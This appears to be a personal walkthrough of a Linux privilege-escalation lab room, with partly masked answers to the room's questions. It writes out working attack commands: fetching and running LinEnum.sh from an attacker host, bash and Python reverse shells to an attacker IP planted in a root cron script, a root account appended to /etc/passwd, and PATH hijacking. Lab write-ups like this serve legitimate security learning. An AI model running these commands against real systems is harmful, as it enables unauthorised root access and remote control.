[Task 1] Get Connected
[Task 2] Understanding Privesc
[Task 3] Direction of Privilege Escalation
[Task 4] Enumeration
- First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
ssh user3@<target ip>
2. What is the target’s hostname?
3. Look at the output of /etc/passwd how many “user[x]” are there on the system?
cat /etc/passwd
4. How many available shells are there on the system?
cat /etc/shells
5. What is the name of the bash script that is set to run every 5 minutes by cron?
cat /etc/crontab
6. What critical file has had its permissions changed to allow some users to write to it?
ANS: /etc/pas***
7. Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!
Try LinEnum.sh
I saved in /opt
In attacker’s machine
python -m SimpleHTTPServer 1234
cd /tmpwget http://<attcker ip>:1234/LinEnum.shchmod 777 LinEnum.sh./LinEnum.sh
You can answer the questions with result from LinEnum.sh too
[Task 5] Abusing SUID/GUID Files
- What is the path of the file in user3’s directory that stands out to you?
find / -perm -u=s -type f 2>/dev/null
Also from LinEnum.sh
2. We know that “shell” is an SUID bit file, therefore running it will run the script as a root user! Lets run it!
We can do this by running: “./shell”
cd ~./shell
3. Congratulations! You should now have a shell as root user, well done!
[Task 6] Exploiting Writeable /etc/passwd
- First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user7, with the password “password”
From LinEnum.sh
su user7
2. Having read the information above, what direction privilege escalation is this attack?
ANS: ver*****
3. Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?
openssl passwd -1 -salt new 123
4. Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?
ANS: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
5. Great! Now you’ve got everything you need. Just add that entry to the end of the /etc/passwd file!
nano /etc/passwd
6. Now, use “su” to login as the “new” account, and then enter the password. If you’ve done everything correctly- you should be greeted by a root prompt! Congratulations!
su new
[Task 7] Escaping Vi Editor
- First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user8, with the password “password”
exitsu user8
2. Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?
sudo -l
3. So, all we need to do is open vi as root, by typing “sudo vi” into the terminal.
sudo vi
4. Now, type “:!sh” to open a shell!
id
[Task 8] Exploiting Crontab
- First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user4, with the password “password”
I know that there’a cronjob with user4’s autoscript.sh
exitsu user4
2. Now, on our host machine- let’s create a payload for our cron exploit using msfvenom.
3. What is the flag to specify a payload in msfvenom?
ANS: -p
4. Create a payload using: “msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R”
Skip this, I’ll use bash instead
bash -i >& /dev/tcp/<attacker ip>/8888 0>&15. What directory is the “autoscript.sh” under?
ANS: /home/user4/*******
6. Lets replace the contents of the file with our payload using: “echo [MSFVENOM OUTPUT] > autoscript.sh”
cd /home/user4/Desktopcat autoscript.sh
echo 'bash -i >& /dev/tcp/<attacker ip>/8888 0>&1' > autoscript.shcat autoscript.sh
7. After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: “nc -lvp 8888” and wait for our shell to land!
nc -lvp 8888
Wait for 5 mins, not work.
I use python shell instead. Just keep trying
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
8. After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!
id
[Task 9] Exploiting PATH Variable
- Going back to our local ssh session, not the netcat root session, you can close that now, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user5, with the password “password”
exitsu user5
2. Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?
cd ~ls
./script
3. Now we know what command to imitate, let’s change directory to “tmp”.
cd /tmp
4. Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo “[whatever command we want to run]” > [name of the executable we’re imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating
echo “/bin/bash” > ls
5. Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?
chmod +X lsorchmod 777 ls
6. Now, we need to change the PATH variable, so that it points to the directory where we have our imitation “ls” stored! We do this using the command “export PATH=/tmp:$PATH”
export PATH=/tmp:$PATH
Note, this will cause you to open a bash prompt every time you use “ls”. If you need to use “ls” before you finish the exploit, use “/bin/ls” where the real “ls” executable is.
Once you’ve finished the exploit, you can exit out of root and use “export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH” to reset the PATH variable back to default, letting you use “ls” again!
7. Now, change directory back to user5’s home directory.
cd ~8. Now, run the “script” file again, you should be sent into a root bash prompt! Congratulations!
./script
